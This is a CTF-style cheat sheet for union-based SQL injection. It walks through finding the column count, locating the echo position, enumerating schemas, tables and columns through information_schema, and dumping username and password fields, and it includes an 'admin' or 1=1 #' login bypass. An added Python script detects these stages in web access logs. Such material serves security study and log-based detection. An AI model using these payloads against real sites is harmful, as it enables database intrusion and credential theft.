[CTF] SQL injection summary
One, SQL injection approach
Field count -> echo position -> database -> table -> column -> flag
1. Log in with the universal password
2. After logging in, inject with a union query
3. Find the number of fields
4. Find the echo position
5. Dump the database name
6. Dump the tables
7. Dump the columns
8. Dump the flag
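In the input box, type # as it is. When injecting through the HackBar address bar, you need to URL-encode #, that is, replace it with %23, because a raw # in a URL starts the fragment and is never sent to the server.
Use order by to find the number of fields: if the error first appears at 4, there are 4-1, that is, 3 fields.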
1' order by 1 #
1' order by 2 #
1' order by 3 #
1' order by 4 #
Use a union query to find the echo position: see which position displays data, then put the command in that position.
1' union select 1,2,3 #
3
Dump the database
1' union select 1,2,version() #
VERSION
1' union select 1,2,database() #
DATABASE,DATABASE1
Dump the tables
When there is only one database, it is simpler to compare table_schema directly with database()
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
When there are multiple databases, select one by name
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE' #
AAA,BBB,CCC
Dump the columns
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='BBB' #
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='CCC' #
id,username,password
Read the content, dump the flag
1' union select 1,2,group_concat(id,username,password) from AAA #
id,username,password
1' union select 1,2,group_concat(username,0x3a,password) from AAA#
username:password,username:password
Condensed version
Find the number of fields
1' order by 1 #
1' order by 2 #
1' order by 3 #
1' order by 1 %23
1' order by 2 %23
1' order by 3 %23
Find the echo position
1' union select 1,2,3 #
Dump the database
1' union select 1,database(),version() #
DATABASE,VERSION
Dump the tables
When there is only one database, it is simpler to compare table_schema directly with database()
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
When there are multiple databases, select one by name
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE' #
AAA,BBB,CCC
Dump the columns of the table
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #
Read the content, dump the flag
Read the AAA table
1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1
An ASCII code can be inserted between the fields as a separator, to make the output easier to read
1' union select 1,2,group_concat(username,0x40,password) from AAA%23&password=1
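For defenders, the steps above leave a recognisable trail in web server access logs. The following script is an added example, not part of the original write-up: it URL-decodes the query string of each log line (so %23 becomes # again) and labels the request with the step it matches. The log lines, the /login.php and /search.php paths, the parameter names and the rule names are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Stage signatures named after the steps of the walk-through (rule names are made up here).
RULES = [
    ("auth_bypass", re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I)),
    ("column_count", re.compile(r"'\s*order\s+by\s+\d+", re.I)),
    ("union_probe", re.compile(r"'\s*union\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"information_schema\.(?:tables|columns)", re.I)),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return (client, param, stage) for every rule hit in one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    client, target = m.groups()
    hits = []
    # parse_qsl percent-decodes each value, so %23 becomes # and %27 becomes '
    for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits += [(client, param, name) for name, rx in RULES if rx.search(value)]
    return hits

def stages_by_client(lines):
    """Map each client address to the ordered list of distinct stages it triggered."""
    seen = defaultdict(list)
    for line in lines:
        for client, _param, stage in scan_line(line):
            if stage not in seen[client]:
                seen[client].append(stage)
    return dict(seen)

# Constructed sample: combined-log-format lines with made-up hosts, paths and parameters.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /login.php?username=admin%27%20or%201%3D1%20%23&password=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /login.php?username=1%27%20order%20by%204%20%23&password=1 HTTP/1.1" 500 87',
    '192.0.2.10 - - [01/Jan/2024:10:00:15 +0000] "GET /login.php?username=1%27%20union%20select%201,2,3%20%23&password=1 HTTP/1.1" 200 530',
    '192.0.2.10 - - [01/Jan/2024:10:00:22 +0000] "GET /login.php?username=1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20%23&password=1 HTTP/1.1" 200 611',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=order%20by%20price&sort=1 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, stages in stages_by_client(SAMPLE_LOG).items():
        print(client, "->", ", ".join(stages))
```

A single client moving through several of these stages in sequence is a much stronger signal than any one match. Payloads submitted in a POST body do not appear in a standard access log, so they need application or WAF logging to be seen.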
Two, SQL injection types
Three, tips
Universal password
admin' or 1=1 #
Common URL encoding
Character | URL encoding |
---|---|
# | %23 |
Commonly used ASCII codes
Hex | Character |
---|---|
0x3a | : |
0x40 | @ |
https://www.litefeel.com/tools/ascii.php
Four, tools
1. HackBar
Shortcut: Ctrl + Enter to execute
2. sqlmap
3. Scripts
Five, bypass
Not finished yet, to be added...